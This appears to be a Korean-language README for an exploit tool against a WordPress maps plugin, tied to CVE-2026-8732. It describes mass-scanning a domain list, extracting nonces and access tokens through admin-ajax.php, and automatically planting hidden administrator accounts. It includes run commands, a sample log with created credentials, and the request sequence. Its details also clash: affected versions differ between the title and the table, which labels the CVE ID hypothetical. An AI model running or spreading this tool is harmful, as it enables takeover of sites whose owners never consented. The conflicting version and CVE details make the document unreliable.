
WP Maps Pro <= 6.1.0 - 인증되지 않은 권한 상승: wpgmp_temp_access_ajax AJAX 액션을 통한 관리자 계정 생성
이 도구는 WordPress용 WP Google Map Pro 플러그인의 취약점인 CVE-2026-8732를 악용합니다. 이 취약점은 인증되지 않은 공격자가 AJAX 엔드포인트(admin-ajax.php?action=wpgmp_temp_access_ajax)를 통해 유효한 wpmp_token을 획득할 수 있게 합니다. 이 토큰을 사용하여 공격자는 WordPress 관리자 패널에 접근하고 새로운 관리자 사용자를 생성할 수 있습니다.
이 도구는 도메인 목록에서 대량 스캔을 수행하고, nonce와 토큰을 추출하며, 취약한 사이트에 숨겨진 관리자 계정을 자동으로 생성합니다. 결과는 전체 토큰 세부 정보와 함께 실시간으로 저장됩니다.
⚠️ 면책 조항: 이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용하세요. 귀하가 소유하거나 테스트할 명시적 권한이 있는 시스템에서만 사용하십시오. 저자는 어떠한 오용에 대해서도 책임을 지지 않습니다.
더 많은 면책 조항은 Jenderal92 표지에서 확인할 수 있습니다. 여기 !!!에서 확인하세요.
admin_created.txt에 저장http:// 및 https:// 모두 지원requests 라이브러리필요한 라이브러리 설치:
pip install requests
git clone https://github.com/Jenderal92/CVE-2026-8732.git
cd CVE-2026-8732
대상 목록 파일을 준비합니다 (한 줄에 하나의 도메인):
example.com
https://target-website.com
http://vulnerable-site.org
스캐너 실행:
python2 exploit.py targets.txt
| 파일 | 내용 |
|---|---|
| res.txt | 취약한 도메인과 전체 토큰 및 리디렉션 URL (있는 경우) |
| admin_created.txt | 성공적으로 생성된 관리자 자격 증명 (도메인, 사용자 이름, 비밀번호, 이메일) |
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
스크립트 내부에서 다음 변수를 편집하세요:
TIMEOUT = 10 # 요청 타임아웃 (초)
JUMLAH_THREAD = 10 # 동시 스레드 수
OUTPUT_FILE = "res.txt" # 취약한 결과 파일
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
wpgmp_local 또는 fc-call-nonce를 추출합니다./wp-admin/admin-ajax.php로 action=wpgmp_temp_access_ajax와 획득한 nonce를 포함한 POST 요청을 보냅니다./wp-admin/user-new.php에 접근하여 _wpnonce_create-user를 추출하고, 새로운 관리자 사용자를 생성하는 POST 요청을 제출합니다.users.php로의 HTTP 302 리디렉션을 확인하거나, 사용자 목록에서 새 사용자 이름을 검색하여 성공을 확인합니다.wpgmp_temp_access_ajax를 비활성화하세요.admin-ajax.php에 대한 악의적인 요청을 차단하세요.이 소프트웨어는 어떠한 종류의 보증 없이 "있는 그대로" 제공됩니다. 소프트웨어의 품질 및 성능에 대한 모든 위험은 사용자에게 있습니다. 책임감 있게 사용하고, 테스트할 권한이 있는 시스템에서만 사용하십시오.
| 필드 | 값 |
|---|
| CVE ID | CVE-2026-8732 (이 플러그인에 대한 가상의 ID) |
| 영향받는 플러그인 | WP Google Map Pro (버전 <= 1.5.0) |
| 취약점 유형 | 끊어진 접근 제어 / 권한 상승 |
| 공격 벡터 | 인증되지 않음, 원격 |
| 영향 | 관리자 계정 생성을 통한 전체 사이트 장악 |